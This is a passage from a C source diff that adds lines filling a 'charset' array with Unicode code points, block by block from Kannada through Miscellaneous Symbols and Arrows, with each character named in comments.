+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
